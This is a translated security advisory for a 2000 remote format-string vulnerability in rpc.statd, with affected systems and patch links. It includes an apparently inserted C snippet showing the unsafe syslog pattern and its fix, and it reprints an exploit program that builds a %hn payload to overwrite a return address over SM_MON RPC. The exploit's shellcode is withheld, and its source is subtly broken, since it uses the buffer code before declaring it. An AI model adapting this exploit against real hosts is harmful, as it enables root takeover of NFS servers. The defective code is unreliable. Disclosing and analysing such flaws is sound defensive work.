Remote format-string stack overflow in rpc.statd

(2000-09-25 00:00) (NSFOCUS translation) (NSFOCUS)
Summary -- The rpc.statd program in the nfs-utils package shipped with many Linux systems contains a security vulnerability. By supplying a specially crafted format string and placing executable code in a buffer, a remote attacker may be able to overwrite a return address on rpc.statd's stack, so remote execution of arbitrary commands is possible......
Release date: 2000-7-20

Last updated: 2000-7-20

Affected systems:
Conectiva Linux 5.0
Conectiva Linux 4.2
Conectiva Linux 4.1
Conectiva Linux 4.0es
Conectiva Linux 4.0
Debian Linux 2.3
Debian Linux 2.2
Linux-Mandrake 7.0
Linux-Mandrake 7.1
RedHat Linux 6.2
RedHat Linux 6.1
RedHat Linux 6.0
Trustix Trustix Secure Linux 1.1
Trustix Trustix Secure Linux 1.0

Unaffected systems:
Debian Linux 2.1

Description:
  The rpc.statd program in the nfs-utils package shipped with many Linux systems contains a security vulnerability. By supplying a specially crafted format string and placing executable code in a buffer, a remote attacker may be able to overwrite a return address on rpc.statd's stack, making remote execution of arbitrary commands possible. Because rpc.statd normally runs as root and does not drop root privileges, the injected code executes as root.

  Debian, Red Hat, Conectiva and Mandrake Linux have published security advisories and patches. Other Linux distributions that run rpc.statd are affected as well. Fortunately, many Linux distributions do not start the rpc.statd service by default.

<* Source: Jeff Uphoff, Chris Evans <chris@ferret.lmh.ox.ac.uk> *>
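As an added illustration (not code from this page or from nfs-utils), the snippet below contrasts the pattern behind this bug, a log line that already contains remotely supplied data being handed to syslog() as its format string, with the hardened form, which keeps the format a literal and passes the data through %s. The STAT_FAIL message layout follows the text quoted in the exploit below; the function names and the count_conversions check are assumptions of this example.

```c
/* Added example: the logging pattern behind the rpc.statd bug and its fix (assumed names). */
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* Build the STAT_FAIL line with a constant format string; the client address
 * and the remotely supplied mon_name only ever travel through %s.
 * Returns the number of bytes written, or -1 if the line would be truncated. */
int build_stat_fail(char *out, size_t outlen, const char *client_ip, const char *mon_name)
{
    int n = snprintf(out, outlen, "STAT_FAIL to %s for SM_MON of %s", client_ip, mon_name);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return n;
}

/* Count the conversion specifications ('%' not escaped as "%%") that a
 * printf-family function would try to interpret if this string were used as
 * the format. A non-zero result on a remote mon_name is worth alerting on. */
int count_conversions(const char *s)
{
    int count = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') {   /* "%%" prints a literal percent sign */
            p++;
            continue;
        }
        count++;
    }
    return count;
}

/* Hardened logging. The vulnerable shape was, in effect,
 *     syslog(LOG_ERR, line);
 * with mon_name already substituted into line, so the remote peer chose the
 * directives. Here the format is a literal and line is plain data. */
void log_stat_fail(const char *client_ip, const char *mon_name)
{
    char line[256];
    if (build_stat_fail(line, sizeof line, client_ip, mon_name) < 0) {
        syslog(LOG_ERR, "SM_MON: mon_name too long to log");
        return;
    }
    syslog(LOG_ERR, "%s", line);
}
```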


Test program:


Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

/*
* Slightly dysfunctional rpc.statd exploit
* for all the dysfunctional script kiddies out there
*
* Author: drow, 07/2000
*
* And just for kicks...
* Greets:
* Chris Evans, whose fault all this is
* whoever wrote the old solaris statd exploit I ripped the RPC code out of
* <james> send out greetz to all the 1337 D3B14N H4X0R2!!!!
* and THEM (THEY know who THEY are)
*
*
* This is dedicated to Joel Klecker. Those who knew him know why.
*
*/

#include <sys/types.h>
#include <sys/time.h>
#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpcsvc/sm_inter.h>
#include <sys/socket.h>

void usage(char *s) {
printf("Usage: %s host [-nopoke]\n", s);
exit(0);
}

/* Shellcode and NOP sled: referenced here but deliberately not supplied on this page. */
extern char shell[];
extern char nop[];

int main(int argc, char *argv[]) {
CLIENT *cl;
enum clnt_stat stat;
struct timeval tm;
struct mon monreq;
struct sm_stat_res monres;
struct hostent *hp;
struct sockaddr_in target;
int sd, i, noplen=strlen(nop), nopoke=0;
char *ptr=code, *p2, code[4096];

if (argc < 2)
usage(argv[0]);
if (argc > 2)
nopoke = 1;

/* Alignment */
strcpy(ptr, "AAA");
ptr += strlen(ptr);

/* Target to write to! */
*(unsigned long *)(ptr) = 0x7fffeb04;
ptr += sizeof(unsigned long);

/* pad */
*(unsigned long *)(ptr) = 0x11111111;
ptr += sizeof(unsigned long);

/* Target Two (two higher in memory probably) */
*(unsigned long *)(ptr) = 0x7fffeb06;
ptr += sizeof(unsigned long);

for(i = 0; i < 46-1; i++) {
strcpy(ptr, "%12d");
ptr += strlen(ptr);
}

if(!nopoke) {
/* Value to write - amount written */
/* Guess a bit - remember to leave a lot of padding, and be lucky on alignment */
/* Dont correct for IP address! Forced to localhost by stat code - same length. */
#define HIGH 0x7fff
#define LOW 0xeecc
sprintf(ptr, "%%%dd%%hn", HIGH - 12*45
- strlen("STAT_FAIL to 127.0.0.1 for SM_MON of AAABBBB1111CCCC"));
ptr += strlen(ptr);

sprintf(ptr, "%%%dd%%hn", (LOW - HIGH) % 65536);
ptr += strlen(ptr);

/* CODE */
p2 = shell;
while(*p2)
*(ptr++) = *(p2++);
}
*(ptr++) = 0;

memset(&monreq, 0, sizeof(monreq));
monreq.mon_id.my_id.my_name="localhost";
monreq.mon_id.my_id.my_prog=0;
monreq.mon_id.my_id.my_vers=0;
monreq.mon_id.my_id.my_proc=0;
monreq.mon_id.mon_name= code /*code*/;

if ((hp=gethostbyname(argv[1])) == NULL) {
printf("Cant resolve %s\n", argv[1]);
exit(0);
}
target.sin_family=AF_INET;
target.sin_addr.s_addr=*(u_long *)hp->h_addr;
target.sin_port=0; /* ask portmap */
sd=RPC_ANYSOCK;

tm.tv_sec=10;
tm.tv_usec=0;
if ((cl=clntudp_create(&target, SM_PROG, SM_VERS, tm, &sd)) == NULL) {
clnt_pcreateerror("clnt_create");
exit(0);
}
stat=clnt_call(cl, SM_MON, xdr_mon, (char *)&monreq, xdr_sm_stat_res,
(char *)&monres, tm);
if (stat != RPC_SUCCESS)
clnt_perror(cl, "clnt_call");
else
printf("stat_res = %d.\n", monres.res_stat);
clnt_destroy(cl);
return 0;
}

--------------------------------------------------------------------------------
Recommendation:
Conectiva Linux 5.0:

Conectiva RPM nfs-utils-0.1.9.1-3cl.i386.rpm 5.0
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/i386/nfs-utils-0.1.9.1-3cl.i386.rpm

Conectiva Linux 4.2:

Conectiva RPM nfs-utils-0.1.9.1-3cl.i386.rpm 4.2
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.2/i386/nfs-utils-0.1.9.1-3cl.i386.rpm

Conectiva Linux 4.1:

Conectiva RPM nfs-utils-0.1.9.1-3cl.i386.rpm 4.1
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.1/i386/nfs-utils-0.1.9.1-3cl.i386.rpm

Conectiva Linux 4.0es:

Conectiva RPM nfs-utils-0.1.9.1-3cl.i386.rpm 4.0es
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.0es/i386/nfs-utils-0.1.9.1-3cl.i386.rpm

Conectiva Linux 4.0:

Conectiva RPM nfs-utils-0.1.9.1-3cl.i386.rpm 4.0
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.0/i386/nfs-utils-0.1.9.1-3cl.i386.rpm

Debian Linux 2.3 sparc:

Debian package nfs-common_0.1.9.1-1.deb sparc 2.3
http://http.us.debian.org/debian/dists/unstable/main/binary-sparc/net/nfs-common_0.1.9.1-1.deb

Debian Linux 2.3 powerpc:

Debian package nfs-common_0.1.9.1-1.deb powerpc 2.3
http://http.us.debian.org/debian/dists/unstable/main/binary-powerpc/net/nfs-common_0.1.9.1-1.deb

Debian Linux 2.3:

Debian package nfs-common_0.1.9.1-1.deb Intel 2.3
http://http.us.debian.org/debian/dists/unstable/main/binary-i386/net/nfs-common_0.1.9.1-1.deb

Debian Linux 2.2 sparc:

Debian package nfs-common_0.1.9.1-1.deb sparc 2.2
http://http.us.debian.org/debian/dists/potato/main/binary-sparc/net/nfs-common_0.1.9.1-1.deb

Debian Linux 2.2 powerpc:

Debian package nfs-common_0.1.9.1-1.deb powerpc 2.2
http://http.us.debian.org/debian/dists/potato/main/binary-powerpc/net/nfs-common_0.1.9.1-1.deb

Debian Linux 2.2 alpha:

Debian package nfs-common_0.1.9.1-1.deb Alpha 2.2
http://http.us.debian.org/debian/dists/potato/main/binary-alpha/net/nfs-common_0.1.9.1-1.deb

Debian Linux 2.2:

Debian package nfs-common_0.1.9.1-1.deb Intel 2.2
http://http.us.debian.org/debian/dists/potato/main/binary-i386/net/nfs-common_0.1.9.1-1.deb

Linux-Mandrake 7.0:

ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/7.0/RPMS/nfs-utils-0.1.9.1-3mdk.i586.rpm
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/7.0/RPMS/nfs-utils-clients-0.1.9.1-3mdk.i586.rpm
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/7.0/SRPMS/nfs-utils-0.1.9.1-3mdk.src.rpm

Linux-Mandrake 7.1:

ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/7.1/RPMS/nfs-utils-0.1.9.1-3mdk.i586.rpm
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/7.1/RPMS/nfs-utils-clients-0.1.9.1-3mdk.i586.rpm
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/7.1/SRPMS/nfs-utils-0.1.9.1-3mdk.src.rpm

RedHat Linux 6.2 sparc:

RedHat RPM nfs-utils-0.1.9.1-1.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/nfs-utils-0.1.9.1-1.sparc.rpm

RedHat Linux 6.2 i386:

RedHat RPM nfs-utils-0.1.9.1-1.i386.rpm
ftp://updates.redhat.com/6.2/i386/nfs-utils-0.1.9.1-1.i386.rpm

RedHat Linux 6.2 alpha:

RedHat RPM nfs-utils-0.1.9.1-1.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/nfs-utils-0.1.9.1-1.alpha.rpm

RedHat Linux 6.1 sparc:

RedHat RPM nfs-utils-0.1.9.1-1.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/nfs-utils-0.1.9.1-1.sparc.rpm

RedHat Linux 6.1 i386:

RedHat RPM nfs-utils-0.1.9.1-1.i386.rpm
ftp://updates.redhat.com/6.2/i386/nfs-utils-0.1.9.1-1.i386.rpm

RedHat Linux 6.1 alpha:

RedHat RPM nfs-utils-0.1.9.1-1.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/nfs-utils-0.1.9.1-1.alpha.rpm

RedHat Linux 6.0 sparc:

RedHat RPM nfs-utils-0.1.9.1-1.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/nfs-utils-0.1.9.1-1.sparc.rpm

RedHat Linux 6.0 i386:

RedHat RPM nfs-utils-0.1.9.1-1.i386.rpm
ftp://updates.redhat.com/6.2/i386/nfs-utils-0.1.9.1-1.i386.rpm

RedHat Linux 6.0 alpha:

RedHat RPM nfs-utils-0.1.9.1-1.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/nfs-utils-0.1.9.1-1.alpha.rpm

Trustix Trustix Secure Linux 1.1:

Trustix RPM nfs-utils-0.1.9.1-1tr.i586.rpm
ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/

Trustix Trustix Secure Linux 1.0:

Trustix RPM nfs-utils-0.1.9.1-1tr.i586.rpm
ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/
